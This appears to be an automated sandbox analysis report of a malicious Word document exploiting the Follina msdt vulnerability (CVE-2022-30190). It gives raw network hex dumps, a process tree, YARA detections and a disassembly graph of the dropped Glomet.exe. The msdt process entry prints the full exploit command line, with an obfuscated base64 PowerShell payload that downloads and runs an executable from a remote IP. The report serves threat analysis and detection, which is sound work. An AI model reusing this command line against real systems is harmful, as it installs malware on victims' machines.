                                                                                                                                                                            Jul 15, 2022 15:28:25.452270031 CEST7936INData Raw: 1f e9 cd 07 00 00 6a ee e8 37 0c 00 00 8d 4d c8 89 45 cc 51 50 6a 0a e8 52 46 00 00 ff d0 88 1e 3b c3 89 45 f4 88 1f c7 45 fc 01 00 00 00 0f 84 9c 0a 00 00 50 6a 40 ff 15 28 81 40 00 3b c3 89 45 08 0f 84 88 0a 00 00 6a 0b e8 1f 46 00 00 6a 0c 89
                                                                                                                                                                            Data Ascii: j7MEQPjRF;EEPj@(@;EjFjEFuEuSuUt:EPEPh@uUt#EMtV,AEMtWA]uR9BEj{jr9]EtVT@;ujSV0@
                                                                                                                                                                            Jul 15, 2022 15:28:25.452286959 CEST7937INData Raw: 00 00 3b fb 88 1e 0f 84 8d 02 00 00 8d 4d c8 c7 45 c8 00 04 00 00 51 8d 4d 08 56 51 53 50 57 ff 15 08 80 40 00 33 c9 41 85 c0 75 2e 83 7d 08 04 74 13 39 4d 08 74 06 83 7d 08 02 75 1d 8b 45 e8 89 45 fc eb 72 ff 36 33 c0 39 5d e8 56 0f 94 c0 89 45
                                                                                                                                                                            Data Ascii: ;MEQMVQSPW@3Au.}t9Mt}uEEr639]VE.<cM\hjt;YU9]MtQVPW@SSSMSQVPW0@tEW@V;;Pj&uuP7
                                                                                                                                                                            Jul 15, 2022 15:28:25.452303886 CEST7939INData Raw: c0 59 7c 28 8d 45 08 50 53 ff 75 e4 8d 45 bc 50 ff d6 85 c0 7c 16 ff 75 08 57 e8 0c 38 00 00 59 59 ff 75 08 ff 15 94 82 40 00 eb 30 c7 45 fc 01 00 00 00 88 1f eb 25 8b 0d 90 b8 42 00 53 23 c8 51 6a 0b ff 75 f8 ff 15 60 82 40 00 39 5d d8 74 0b 53
                                                                                                                                                                            Data Ascii: Y|(EPSuEP|uW8YYu@0E%BS#Qju`@9]tSSuP@EB3_^[*@@@@@@@o@@@Y@@A@b@j@@@F@Y@@@2@G@Y@@@^@@c@@.@.@@
                                                                                                                                                                            Jul 15, 2022 15:28:25.452318907 CEST7940INData Raw: 00 8b fe f7 d8 1b c0 25 00 7e 00 00 05 00 02 00 00 3b f0 72 02 8b f8 57 53 e8 94 03 00 00 85 c0 0f 84 20 01 00 00 83 3d 34 f4 42 00 00 75 7a 6a 1c 8d 45 d8 53 50 e8 c7 2d 00 00 8b 45 d8 a9 f0 ff ff ff 75 72 81 7d dc ef be ad de 75 69 81 7d e8 49
                                                                                                                                                                            Data Ascii: %~;rWS =4BuzjESP-Eur}ui}Instu`}softuW}NulluNEE@ABE;4BEuEu?Ep;vEujOY;5LBsWSu6E=@A+"3j"94BYtS9]t"5
                                                                                                                                                                            Jul 15, 2022 15:28:25.452368021 CEST7942INData Raw: 00 56 ff 15 cc 80 40 00 8d 74 06 01 80 3e 00 75 ea 6a 0b e8 6e 31 00 00 6a 09 e8 67 31 00 00 6a 07 a3 24 f4 42 00 e8 5b 31 00 00 3b c7 74 0f 6a 1e ff d0 85 c0 74 07 80 0d dc f4 42 00 80 53 ff 15 38 80 40 00 57 ff 15 88 82 40 00 a3 e0 f4 42 00 57
                                                                                                                                                                            Data Ascii: V@t>ujn1jg1j$B[1;tjtBS8@W@BWh`PWhPBl@h@h B-@PCPS,=PC" B@uE"PCuP&P@E u@8 t8"E u@E"8/@8SuH t
                                                                                                                                                                            Jul 15, 2022 15:28:25.452434063 CEST7943INData Raw: 85 c0 74 1b 8b 4c 24 0c 89 70 08 89 48 04 8b 0d 54 98 42 00 89 08 a3 54 98 42 00 33 c0 eb 03 83 c8 ff 5e c2 08 00 83 ec 10 53 55 56 8b 35 30 f4 42 00 57 6a 02 e8 12 2c 00 00 33 db 3b c3 74 12 ff d0 0f b7 c0 50 68 00 60 43 00 e8 4e 27 00 00 eb 54
                                                                                                                                                                            Data Ascii: tL$pHTBTB3^SUV50BWj,3;tPh`CN'TBSWShL@h`C0`Cx`C&8BuSWhj@h$@h&Wh`C'@8BTC UBB!NH;tzVLXBBSWRQv
                                                                                                                                                                            Jul 15, 2022 15:28:25.481878996 CEST7944INData Raw: 00 00 8b 44 24 2c 8b 7c 24 24 3b f1 a3 78 a8 42 00 75 4d 8b 35 38 82 40 00 6a 01 57 89 3d 28 f4 42 00 ff d6 6a 02 57 a3 8c a8 42 00 ff d6 6a ff 6a 1c 57 a3 58 98 42 00 e8 46 03 00 00 ff 35 08 ec 42 00 6a f2 57 ff 15 d8 81 40 00 6a 04 e8 67 d4 ff
                                                                                                                                                                            Data Ascii: D$,|$$;xBuM58@jW=(BjWBjjWXBF5BjW@jgB3@xB@35@B;|>u1Uvt$jUh5B`@39-B9.hxB@@;DBuj9-BDB


                                                                                                                                                                            Statistics

                                                                                                                                                                            CPU Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Memory Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                            Behavior

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            System Behavior

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:15:26:31
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                            Imagebase:0x3f0000
                                                                                                                                                                            File size:1937688 bytes
                                                                                                                                                                            MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:6
                                                                                                                                                                            Start time:15:26:38
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                            Imagebase:0xea0000
                                                                                                                                                                            File size:466688 bytes
                                                                                                                                                                            MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:13
                                                                                                                                                                            Start time:15:26:43
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
                                                                                                                                                                            Imagebase:0x12b0000
                                                                                                                                                                            File size:1508352 bytes
                                                                                                                                                                            MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.576330720.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.576021489.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.577239005.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.576945424.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.576945424.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:18
                                                                                                                                                                            Start time:15:27:15
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\splwow64.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                                                            Imagebase:0x7ff78b240000
                                                                                                                                                                            File size:130560 bytes
                                                                                                                                                                            MD5 hash:8D59B31FF375059E3C32B17BF31A76D5
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:20
                                                                                                                                                                            Start time:15:27:38
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.cmdline
                                                                                                                                                                            Imagebase:0xcf0000
                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:23
                                                                                                                                                                            Start time:15:27:45
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP"
                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:25
                                                                                                                                                                            Start time:15:27:50
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.cmdline
                                                                                                                                                                            Imagebase:0xcf0000
                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:26
                                                                                                                                                                            Start time:15:27:52
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP"
                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:29
                                                                                                                                                                            Start time:15:28:27
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\ProgramData\Glomet.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\programdata\Glomet.exe"
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:346688 bytes
                                                                                                                                                                            MD5 hash:7A560CE2C90976F306953F3BF4EFEBF9
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:30
                                                                                                                                                                            Start time:15:28:30
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.cmdline
                                                                                                                                                                            Imagebase:0xcf0000
                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:31
                                                                                                                                                                            Start time:15:28:33
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP"
                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:34
                                                                                                                                                                            Start time:15:28:45
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:CMD.EXE /C SET /A "0x00^75"
                                                                                                                                                                            Imagebase:0xc20000
                                                                                                                                                                            File size:232960 bytes
                                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:36
                                                                                                                                                                            Start time:15:28:46
                                                                                                                                                                            Start date:15/07/2022
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff7c9170000
                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                            Disassembly

                                                                                                                                                                            Reset < >

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:26.7%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:17.3%
                                                                                                                                                                              Total number of Nodes:1316
                                                                                                                                                                              Total number of Limit Nodes:43
                                                                                                                                                                              execution_graph 2871 401ec5 2879 402c17 2871->2879 2873 401ecb 2874 402c17 17 API calls 2873->2874 2875 401ed7 2874->2875 2876 401ee3 ShowWindow 2875->2876 2877 401eee EnableWindow 2875->2877 2878 402ac5 2876->2878 2877->2878 2882 4062ea 2879->2882 2881 402c2c 2881->2873 2883 4062f7 2882->2883 2884 40651c 2883->2884 2887 4064f6 lstrlenA 2883->2887 2889 4062ea 10 API calls 2883->2889 2892 406412 GetSystemDirectoryA 2883->2892 2893 406425 GetWindowsDirectoryA 2883->2893 2895 4062ea 10 API calls 2883->2895 2896 40649f lstrcatA 2883->2896 2897 406459 SHGetSpecialFolderLocation 2883->2897 2899 40613e 2883->2899 2904 406535 2883->2904 2913 4061b5 wsprintfA 2883->2913 2914 406257 lstrcpynA 2883->2914 2885 406531 2884->2885 2915 406257 lstrcpynA 2884->2915 2885->2881 2887->2883 2889->2887 2892->2883 2893->2883 2895->2883 2896->2883 2897->2883 2898 406471 SHGetPathFromIDListA CoTaskMemFree 2897->2898 2898->2883 2916 4060dd 2899->2916 2902 406172 RegQueryValueExA RegCloseKey 2903 4061a1 2902->2903 2903->2883 2911 406541 2904->2911 2905 4065a9 2906 4065ad CharPrevA 2905->2906 2908 4065c8 2905->2908 2906->2905 2907 40659e CharNextA 2907->2905 2907->2911 2908->2883 2910 40658c CharNextA 2910->2911 2911->2905 2911->2907 2911->2910 2912 406599 CharNextA 2911->2912 2920 405c14 2911->2920 2912->2907 2913->2883 2914->2883 2915->2885 2917 4060ec 2916->2917 2918 4060f0 2917->2918 2919 4060f5 RegOpenKeyExA 2917->2919 2918->2902 2918->2903 2919->2918 2921 405c1a 2920->2921 2922 405c2d 2921->2922 2923 405c20 CharNextA 2921->2923 2922->2911 2923->2921 2962 401746 2963 402c39 17 API calls 2962->2963 2964 40174d 2963->2964 2968 405e19 2964->2968 2966 401754 2967 405e19 2 API calls 2966->2967 2967->2966 2969 405e24 GetTickCount GetTempFileNameA 2968->2969 2970 405e51 2969->2970 2971 405e55 2969->2971 2970->2969 2970->2971 2971->2966 3777 401947 3778 402c39 17 API calls 3777->3778 3779 40194e lstrlenA 3778->3779 3780 402628 3779->3780 3784 401fcb 3785 402c39 17 API calls 3784->3785 3786 401fd2 3785->3786 3787 4065ce 2 API calls 3786->3787 3788 401fd8 3787->3788 3790 401fea 3788->3790 3791 4061b5 wsprintfA 3788->3791 3791->3790 3510 4014d6 3511 402c17 17 API calls 3510->3511 3512 4014dc Sleep 3511->3512 3514 402ac5 3512->3514 3585 401759 3586 402c39 17 API calls 3585->3586 3587 401760 3586->3587 3588 401786 3587->3588 3589 40177e 3587->3589 3625 406257 lstrcpynA 3588->3625 3624 406257 lstrcpynA 3589->3624 3592 401784 3596 406535 5 API calls 3592->3596 3593 401791 3594 405be9 3 API calls 3593->3594 3595 401797 lstrcatA 3594->3595 3595->3592 3621 4017a3 3596->3621 3597 4065ce 2 API calls 3597->3621 3598 405dc5 2 API calls 3598->3621 3600 4017ba CompareFileTime 3600->3621 3601 40187e 3602 405378 24 API calls 3601->3602 3604 401888 3602->3604 3603 401855 3605 405378 24 API calls 3603->3605 3612 40186a 3603->3612 3607 403143 31 API calls 3604->3607 3605->3612 3606 406257 lstrcpynA 3606->3621 3608 40189b 3607->3608 3609 4018af SetFileTime 3608->3609 3611 4018c1 FindCloseChangeNotification 3608->3611 3609->3611 3610 4062ea 17 API calls 3610->3621 3611->3612 3613 4018d2 3611->3613 3614 4018d7 3613->3614 3615 4018ea 3613->3615 3616 4062ea 17 API calls 3614->3616 3617 4062ea 17 API calls 3615->3617 3619 4018df lstrcatA 3616->3619 3620 4018f2 3617->3620 3618 40596d MessageBoxIndirectA 3618->3621 3619->3620 3622 40596d MessageBoxIndirectA 3620->3622 3621->3597 3621->3598 3621->3600 3621->3601 3621->3603 3621->3606 3621->3610 3621->3618 3623 405dea GetFileAttributesA CreateFileA 3621->3623 3622->3612 3623->3621 3624->3592 3625->3593 3792 401659 3793 402c39 17 API calls 3792->3793 3794 40165f 3793->3794 3795 4065ce 2 API calls 3794->3795 3796 401665 3795->3796 3797 401959 3798 402c17 17 API calls 3797->3798 3799 401960 3798->3799 3800 402c17 17 API calls 3799->3800 3801 40196d 3800->3801 3802 402c39 17 API calls 3801->3802 3803 401984 lstrlenA 3802->3803 3804 401994 3803->3804 3807 4019d4 3804->3807 3809 406257 lstrcpynA 3804->3809 3806 4019c4 3806->3807 3808 4019c9 lstrlenA 3806->3808 3808->3807 3809->3806 3810 404cd9 GetDlgItem GetDlgItem 3811 404d2f 7 API calls 3810->3811 3822 404f56 3810->3822 3812 404dd7 DeleteObject 3811->3812 3813 404dcb SendMessageA 3811->3813 3814 404de2 3812->3814 3813->3812 3816 404e19 3814->3816 3817 4062ea 17 API calls 3814->3817 3815 405038 3819 4050e4 3815->3819 3825 404f49 3815->3825 3826 405091 SendMessageA 3815->3826 3818 4042d4 18 API calls 3816->3818 3823 404dfb SendMessageA SendMessageA 3817->3823 3824 404e2d 3818->3824 3820 4050f6 3819->3820 3821 4050ee SendMessageA 3819->3821 3834 405108 ImageList_Destroy 3820->3834 3835 40510f 3820->3835 3839 40511f 3820->3839 3821->3820 3822->3815 3845 404fc5 3822->3845 3864 404c27 SendMessageA 3822->3864 3823->3814 3830 4042d4 18 API calls 3824->3830 3828 40433b 8 API calls 3825->3828 3826->3825 3832 4050a6 SendMessageA 3826->3832 3827 40502a SendMessageA 3827->3815 3833 4052e5 3828->3833 3842 404e3e 3830->3842 3831 405299 3831->3825 3840 4052ab ShowWindow GetDlgItem ShowWindow 3831->3840 3837 4050b9 3832->3837 3834->3835 3838 405118 GlobalFree 3835->3838 3835->3839 3836 404f18 GetWindowLongA SetWindowLongA 3841 404f31 3836->3841 3847 4050ca SendMessageA 3837->3847 3838->3839 3839->3831 3855 40515a 3839->3855 3869 404ca7 3839->3869 3840->3825 3843 404f36 ShowWindow 3841->3843 3844 404f4e 3841->3844 3842->3836 3846 404e90 SendMessageA 3842->3846 3848 404f13 3842->3848 3852 404ee2 SendMessageA 3842->3852 3853 404ece SendMessageA 3842->3853 3862 404309 SendMessageA 3843->3862 3863 404309 SendMessageA 3844->3863 3845->3815 3845->3827 3846->3842 3847->3819 3848->3836 3848->3841 3849 40519e 3856 405264 3849->3856 3861 405212 SendMessageA SendMessageA 3849->3861 3852->3842 3853->3842 3855->3849 3858 405188 SendMessageA 3855->3858 3857 40526f InvalidateRect 3856->3857 3859 40527b 3856->3859 3857->3859 3858->3849 3859->3831 3878 404be2 3859->3878 3861->3849 3862->3825 3863->3822 3865 404c86 SendMessageA 3864->3865 3866 404c4a GetMessagePos ScreenToClient SendMessageA 3864->3866 3868 404c7e 3865->3868 3867 404c83 3866->3867 3866->3868 3867->3865 3868->3845 3881 406257 lstrcpynA 3869->3881 3871 404cba 3882 4061b5 wsprintfA 3871->3882 3873 404cc4 3874 40140b 2 API calls 3873->3874 3875 404ccd 3874->3875 3883 406257 lstrcpynA 3875->3883 3877 404cd4 3877->3855 3884 404b1d 3878->3884 3880 404bf7 3880->3831 3881->3871 3882->3873 3883->3877 3885 404b33 3884->3885 3886 4062ea 17 API calls 3885->3886 3887 404b97 3886->3887 3888 4062ea 17 API calls 3887->3888 3889 404ba2 3888->3889 3890 4062ea 17 API calls 3889->3890 3891 404bb8 lstrlenA wsprintfA SetDlgItemTextA 3890->3891 3891->3880 3626 403dda 3627 403df2 3626->3627 3628 403f53 3626->3628 3627->3628 3631 403dfe 3627->3631 3629 403fa4 3628->3629 3630 403f64 GetDlgItem GetDlgItem 3628->3630 3633 403ffe 3629->3633 3645 401389 2 API calls 3629->3645 3632 4042d4 18 API calls 3630->3632 3634 403e09 SetWindowPos 3631->3634 3635 403e1c 3631->3635 3638 403f8e KiUserCallbackDispatcher 3632->3638 3639 404320 SendMessageA 3633->3639 3646 403f4e 3633->3646 3634->3635 3636 403e25 ShowWindow 3635->3636 3637 403e67 3635->3637 3640 403f40 3636->3640 3641 403e45 GetWindowLongA 3636->3641 3642 403e86 3637->3642 3643 403e6f DestroyWindow 3637->3643 3644 40140b 2 API calls 3638->3644 3669 404010 3639->3669 3652 40433b 8 API calls 3640->3652 3641->3640 3647 403e5e ShowWindow 3641->3647 3649 403e8b SetWindowLongA 3642->3649 3650 403e9c 3642->3650 3648 40425d 3643->3648 3644->3629 3651 403fd6 3645->3651 3647->3637 3648->3646 3657 40428e ShowWindow 3648->3657 3649->3646 3650->3640 3655 403ea8 GetDlgItem 3650->3655 3651->3633 3656 403fda SendMessageA 3651->3656 3652->3646 3653 40140b 2 API calls 3653->3669 3654 40425f DestroyWindow EndDialog 3654->3648 3658 403ed6 3655->3658 3659 403eb9 SendMessageA IsWindowEnabled 3655->3659 3656->3646 3657->3646 3661 403ee3 3658->3661 3662 403ef6 3658->3662 3663 403f2a SendMessageA 3658->3663 3672 403edb 3658->3672 3659->3646 3659->3658 3660 4062ea 17 API calls 3660->3669 3661->3663 3661->3672 3666 403f13 3662->3666 3667 403efe 3662->3667 3663->3640 3664 4042ad SendMessageA 3668 403f11 3664->3668 3665 4042d4 18 API calls 3665->3669 3671 40140b 2 API calls 3666->3671 3670 40140b 2 API calls 3667->3670 3668->3640 3669->3646 3669->3653 3669->3654 3669->3660 3669->3665 3674 4042d4 18 API calls 3669->3674 3690 40419f DestroyWindow 3669->3690 3670->3672 3673 403f1a 3671->3673 3672->3664 3673->3640 3673->3672 3675 40408b GetDlgItem 3674->3675 3676 4040a0 3675->3676 3677 4040a8 ShowWindow KiUserCallbackDispatcher 3675->3677 3676->3677 3699 4042f6 KiUserCallbackDispatcher 3677->3699 3679 4040d2 EnableWindow 3684 4040e6 3679->3684 3680 4040eb GetSystemMenu EnableMenuItem SendMessageA 3681 40411b SendMessageA 3680->3681 3680->3684 3681->3684 3683 403dbb 18 API calls 3683->3684 3684->3680 3684->3683 3700 404309 SendMessageA 3684->3700 3701 406257 lstrcpynA 3684->3701 3686 40414a lstrlenA 3687 4062ea 17 API calls 3686->3687 3688 40415b SetWindowTextA 3687->3688 3689 401389 2 API calls 3688->3689 3689->3669 3690->3648 3691 4041b9 CreateDialogParamA 3690->3691 3691->3648 3692 4041ec 3691->3692 3693 4042d4 18 API calls 3692->3693 3694 4041f7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3693->3694 3695 401389 2 API calls 3694->3695 3696 40423d 3695->3696 3696->3646 3697 404245 ShowWindow 3696->3697 3698 404320 SendMessageA 3697->3698 3698->3648 3699->3679 3700->3684 3701->3686 3892 401a5e 3893 402c17 17 API calls 3892->3893 3894 401a67 3893->3894 3895 402c17 17 API calls 3894->3895 3896 401a0e 3895->3896 3897 401563 3898 402a42 3897->3898 3901 4061b5 wsprintfA 3898->3901 3900 402a47 3901->3900 3902 401b63 3903 402c39 17 API calls 3902->3903 3904 401b6a 3903->3904 3905 402c17 17 API calls 3904->3905 3906 401b73 wsprintfA 3905->3906 3907 402ac5 3906->3907 3908 401d65 3909 401d78 GetDlgItem 3908->3909 3910 401d6b 3908->3910 3912 401d72 3909->3912 3911 402c17 17 API calls 3910->3911 3911->3912 3913 401db9 GetClientRect LoadImageA SendMessageA 3912->3913 3914 402c39 17 API calls 3912->3914 3916 401e1a 3913->3916 3918 401e26 3913->3918 3914->3913 3917 401e1f DeleteObject 3916->3917 3916->3918 